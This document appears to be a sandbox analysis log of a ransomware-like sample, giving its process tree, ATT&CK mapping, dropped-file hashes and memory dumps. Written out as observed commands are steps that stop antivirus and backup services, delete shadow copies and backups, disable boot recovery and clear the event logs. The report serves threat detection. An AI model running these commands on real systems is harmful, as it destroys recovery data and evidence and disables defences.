
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
5⤵
PID:2912

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop mfevtp /y
3⤵
PID:4720

C:\Windows\SysWOW64\net.exe
net stop mfevtp /y
4⤵
PID:624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
5⤵
PID:3620

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop mozyprobackup /y
3⤵
PID:2020

C:\Windows\SysWOW64\net.exe
net stop mozyprobackup /y
4⤵
PID:1532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
5⤵
PID:3344

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop msftesql$PROD /y
3⤵
PID:828

C:\Windows\SysWOW64\net.exe
net stop msftesql$PROD /y
4⤵
PID:1436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
5⤵
PID:1308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop ntrtscan /y
3⤵
PID:2220

C:\Windows\SysWOW64\net.exe
net stop ntrtscan /y
4⤵
PID:2672

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
5⤵
PID:4376

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop sacsvr /y
3⤵
PID:4696

C:\Windows\SysWOW64\net.exe
net stop sacsvr /y
4⤵
PID:768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
5⤵
PID:4316

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop sophossps /y
3⤵
PID:3060

C:\Windows\SysWOW64\net.exe
net stop sophossps /y
4⤵
PID:1000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
5⤵
PID:1824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop svcGenericHost /y
3⤵
PID:2408

C:\Windows\SysWOW64\net.exe
net stop svcGenericHost /y
4⤵
PID:2960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
5⤵
PID:1080

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop swi_filter /y
3⤵
PID:964

C:\Windows\SysWOW64\net.exe
net stop swi_filter /y
4⤵
PID:3600

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
5⤵
PID:4972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop swi_service /y
3⤵
PID:1072

C:\Windows\SysWOW64\net.exe
net stop swi_service /y
4⤵
PID:4268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
5⤵
PID:2548

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop swi_update /y
3⤵
PID:2648

C:\Windows\SysWOW64\net.exe
net stop swi_update /y
4⤵
PID:5068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
5⤵
PID:4140

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop swi_update_64 /y
3⤵
PID:3964

C:\Windows\SysWOW64\net.exe
net stop swi_update_64 /y
4⤵
PID:5100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
5⤵
PID:4488

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop tmlisten /y
3⤵
PID:2172

C:\Windows\SysWOW64\net.exe
net stop tmlisten /y
4⤵
PID:3972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
5⤵
PID:4744

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop wbengine /y
3⤵
PID:3056

C:\Windows\SysWOW64\net.exe
net stop wbengine /y
4⤵
PID:456

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
5⤵
PID:4392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C net stop wbengine /y
3⤵
PID:4136

C:\Windows\SysWOW64\net.exe
net stop wbengine /y
4⤵
PID:2844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
5⤵
PID:3908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
3⤵
PID:3476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
3⤵
PID:4232

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
3⤵
PID:996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup
3⤵
PID:1712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup -keepversions:0
3⤵
PID:460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete backup
3⤵
PID:4964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
3⤵
PID:1416

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4156

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
3⤵
PID:4204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
3⤵
PID:880

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
4⤵
PID:916

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
3⤵
PID:5052

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
4⤵
PID:1144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
3⤵
PID:868

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
4⤵
PID:3180

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C attrib "%userprofile%\documents\Default.rdp" -s -h
3⤵
PID:2232

C:\Windows\SysWOW64\attrib.exe
attrib "C:\Users\Admin\documents\Default.rdp" -s -h
4⤵
- Views/modifies file attributes
PID:1316

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C del "%userprofile%\documents\Default.rdp"
3⤵
PID:2292

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Application
3⤵
PID:1020

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe clear-log Application
4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Security
3⤵
PID:3532

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe clear-log Security
4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log System
3⤵
PID:5080

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe clear-log System
4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C sc config eventlog start=disabled
3⤵
PID:1824

C:\Windows\SysWOW64\sc.exe
sc config eventlog start=disabled
4⤵
- Launches sc.exe
PID:3060

C:\Windows\SysWOW64\notepad.exe
notepad.exe
2⤵
PID:1920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:4104

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5032

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Indicator Removal on Host

T1070

File Deletion

T1107

Modify Registry

T1112

Install Root Certificate

T1130

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
Filesize
728B

MD5
f4c83a1d286b21beab4beff15e456bcc

SHA1
ba39d94f00adbe78bc1e625e2227ace3e1599533

SHA256
61dac4068dd0e2a479a977eec641629f4cf7da9764d284a9ae76b5ed3768cfa6

SHA512
fb2bfe0e8209ac317069906f90132c417d15be517aa628162a0ac5d915e57c25d653c44b5c31a101398770277468c31ec0300087ff31e3b834822e146b37f08e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_8AE57F9FAAC778EA4099F469BEEE4C46
Filesize
472B

MD5
0d239cc711741c15b936d5fe3ac425dc

SHA1
e0748be47d0023909843b2976a2ca474cb2e9233

SHA256
9bc1f05479105878355603c4d1f936ea3f7383494de6dd106b97f0d69aabd833

SHA512
873df6a6224656faecdfbf2503617e1737bf315bc702a451d20a9834a87cd995f4b0d24d5ad717b99138715557a465d077fb002bc4a9641146486d5119fc9024

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize
471B

MD5
08a6cafc63db4d500c1de531b2f73d9c

SHA1
5868e7435e4d710ef27a2007ac20cc8411b08454

SHA256
4872f59f963b9da3dc0e82995fcacfeb77366e0b631b90c4c0a14b738e3cf2f3

SHA512
bbe04b36fc8b928aecc8706459ffde4749e9b175d0d803490540ad5a717addc8b40bf0f05a08eff342c2e495e338b51d57226ea105d164dda3cea7a01b459248

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
Filesize
398B

MD5
22070d90a00885c72036dcd820c5728e

SHA1
e6bae3df26bfbe1ef35da335b365844bab92327f

SHA256
942bed723f0f8f43e02fa213d0f7a59a1a828d00e9bbd47befea3a44b8135a27

SHA512
d58042ebd28e5c9b0f3b0477787987ab6b39420bb006da6066a299a7b747acde64bd8b392441534bb847e5ecb2b208c30ff8a33db5a0431affa4e6e204782473

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_8AE57F9FAAC778EA4099F469BEEE4C46
Filesize
402B

MD5
d261385d2a21bd8679835ed475608575

SHA1
14ed1fb30f2c26a7b27c69f727baf2c57ba9321f

SHA256
b032dab2ccddafc695fb123798ba9426de825853615313aa56be6405a4d63e99

SHA512
fd4a6561c7035a465766b629e811d951d8e23af889ff61e51560cab24ac06356d714f273c31ea8d0c122f5c8b359cd34f8bf6f3aa5840d41a7fd8fff9dbce26a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize
396B

MD5
27e3f98c7bf814948715abc4cd2a5ecb

SHA1
ed1606b0ea65dba0bb345efa09f2810bb8ba69e3

SHA256
14ae88c2d760379171d85f39db2d451344a83da93ad9fd77bbec9c7dd57a2ef2

SHA512
2ba05e583a88eaa5b6f919d5b6a10bb5fd9f6e9152f889f6e75545af959af9644d2bdbd367403549bd3db62af969b1460db67a4b77ed51e910598c4ad18814ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2VJX7YH7\18DI20OM.htm
Filesize
18KB

MD5
6b17a59cec1a7783febae9aa55c56556

SHA1
01d4581e2b3a6348679147a915a0b22b2a66643a

SHA256
66987b14b90d41632be98836f9601b12e7f329ffab05595887889c9c5716fbeb

SHA512
3337efd12b9c06b7768eb928a78caae243b75257c5aabe7a49e908a2f735af55f7257a40bd2330dc13865ead18ed805b54a6c5105740fdcbbaccacf7997bcbc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8SYI24T6\H1BK9RVI.htm
Filesize
184B

MD5
b1cd7c031debba3a5c77b39b6791c1a7

SHA1
e5d91e14e9c685b06f00e550d9e189deb2075f76

SHA256
57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

SHA512
d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\StartMenuExperienceHost.exe
Filesize
477KB

MD5
a1b5dc4fd2cd2b54498faf42fe9b5e50

SHA1
46edeab30fe0696422edad230116c51d5b145aa3

SHA256
533e14cb3a1434f68321fb9fd2a2e66d0a12ce16f792ee47e77edf8eb2aeac21

SHA512
6316f72a06960def5f9f086b4a258adf8dad7396524597fa23f2b781b87418b1009b5b8f7a67e90406739e2bdf3db873254ace84b64c6b569bda8c0435821848

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\StartMenuExperienceHost.exe
Filesize
477KB

MD5
a1b5dc4fd2cd2b54498faf42fe9b5e50

SHA1
46edeab30fe0696422edad230116c51d5b145aa3

SHA256
533e14cb3a1434f68321fb9fd2a2e66d0a12ce16f792ee47e77edf8eb2aeac21

SHA512
6316f72a06960def5f9f086b4a258adf8dad7396524597fa23f2b781b87418b1009b5b8f7a67e90406739e2bdf3db873254ace84b64c6b569bda8c0435821848

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\StartMenuExperienceHost.exe
Filesize
477KB

MD5
a1b5dc4fd2cd2b54498faf42fe9b5e50

SHA1
46edeab30fe0696422edad230116c51d5b145aa3

SHA256
533e14cb3a1434f68321fb9fd2a2e66d0a12ce16f792ee47e77edf8eb2aeac21

SHA512
6316f72a06960def5f9f086b4a258adf8dad7396524597fa23f2b781b87418b1009b5b8f7a67e90406739e2bdf3db873254ace84b64c6b569bda8c0435821848

Download Submit
memory/312-137-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/312-132-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/312-131-0x0000000002200000-0x0000000002376000-memory.dmp

Filesize
1.5MB

Download
memory/312-130-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/312-138-0x0000000002200000-0x0000000002376000-memory.dmp

Filesize
1.5MB

Download
memory/456-201-0x0000000000000000-mapping.dmp

Download
memory/540-154-0x0000000000000000-mapping.dmp

Download
memory/628-189-0x0000000000000000-mapping.dmp

Download
memory/760-164-0x0000000000000000-mapping.dmp

Download
memory/868-163-0x0000000000000000-mapping.dmp

Download
memory/912-194-0x0000000000000000-mapping.dmp

Download
memory/924-168-0x0000000000000000-mapping.dmp

Download
memory/1020-170-0x0000000000000000-mapping.dmp

Download
memory/1124-165-0x0000000000000000-mapping.dmp

Download
memory/1132-186-0x0000000000000000-mapping.dmp

Download
memory/1136-214-0x0000000000000000-mapping.dmp

Download
memory/1384-157-0x0000000000000000-mapping.dmp

Download
memory/1432-160-0x0000000000000000-mapping.dmp

Download
memory/1452-198-0x0000000000000000-mapping.dmp

Download
memory/1524-171-0x0000000000000000-mapping.dmp

Download
memory/1580-210-0x0000000000000000-mapping.dmp

Download
memory/1816-173-0x0000000000000000-mapping.dmp

Download
memory/1920-136-0x0000000000000000-mapping.dmp

Download
memory/1940-184-0x0000000000000000-mapping.dmp

Download
memory/2012-179-0x0000000000000000-mapping.dmp

Download
memory/2136-207-0x0000000000000000-mapping.dmp

Download
memory/2176-155-0x0000000000000000-mapping.dmp

Download
memory/2188-211-0x0000000000000000-mapping.dmp

Download
memory/2196-183-0x0000000000000000-mapping.dmp

Download
memory/2216-172-0x0000000000000000-mapping.dmp

Download
memory/2236-193-0x0000000000000000-mapping.dmp

Download
memory/2440-180-0x0000000000000000-mapping.dmp

Download
memory/2504-209-0x0000000000000000-mapping.dmp

Download
memory/2672-178-0x0000000000000000-mapping.dmp

Download
memory/2708-192-0x0000000000000000-mapping.dmp

Download
memory/3152-174-0x0000000000000000-mapping.dmp

Download
memory/3212-188-0x0000000000000000-mapping.dmp

Download
memory/3344-167-0x0000000000000000-mapping.dmp

Download
memory/3396-197-0x0000000000000000-mapping.dmp

Download
memory/3476-200-0x0000000000000000-mapping.dmp

Download
memory/3540-166-0x0000000000000000-mapping.dmp

Download
memory/3552-216-0x0000000000000000-mapping.dmp

Download
memory/3688-181-0x0000000000000000-mapping.dmp

Download
memory/3720-202-0x0000000000000000-mapping.dmp

Download
memory/3768-212-0x0000000000000000-mapping.dmp

Download
memory/3772-213-0x0000000000000000-mapping.dmp

Download
memory/3896-152-0x0000000000000000-mapping.dmp

Download
memory/3896-169-0x00000000022A0000-0x0000000002416000-memory.dmp

Filesize
1.5MB

Download
memory/3896-219-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/3896-218-0x00000000022A0000-0x0000000002416000-memory.dmp

Filesize
1.5MB

Download
memory/3896-217-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/3896-195-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/3932-176-0x0000000000000000-mapping.dmp

Download
memory/3968-196-0x0000000000000000-mapping.dmp

Download
memory/4040-185-0x0000000000000000-mapping.dmp

Download
memory/4192-199-0x0000000000000000-mapping.dmp

Download
memory/4232-203-0x0000000000000000-mapping.dmp

Download
memory/4240-149-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/4240-151-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/4240-133-0x0000000000000000-mapping.dmp

Download
memory/4240-139-0x0000000002320000-0x0000000002496000-memory.dmp

Filesize
1.5MB

Download
memory/4240-142-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/4240-150-0x0000000002320000-0x0000000002496000-memory.dmp

Filesize
1.5MB

Download
memory/4272-187-0x0000000000000000-mapping.dmp

Download
memory/4348-161-0x0000000000000000-mapping.dmp

Download
memory/4376-177-0x0000000000000000-mapping.dmp

Download
memory/4472-204-0x0000000000000000-mapping.dmp

Download
memory/4544-208-0x0000000000000000-mapping.dmp

Download
memory/4604-159-0x0000000000000000-mapping.dmp

Download
memory/4612-175-0x0000000000000000-mapping.dmp

Download
memory/4656-158-0x0000000000000000-mapping.dmp

Download
memory/4716-156-0x0000000000000000-mapping.dmp

Download
memory/4736-191-0x0000000000000000-mapping.dmp

Download
memory/4752-182-0x0000000000000000-mapping.dmp

Download
memory/4900-205-0x0000000000000000-mapping.dmp

Download
memory/4992-162-0x0000000000000000-mapping.dmp

Download
memory/5024-215-0x0000000000000000-mapping.dmp

Download
memory/5044-206-0x0000000000000000-mapping.dmp

Download
memory/5088-190-0x0000000000000000-mapping.dmp

Download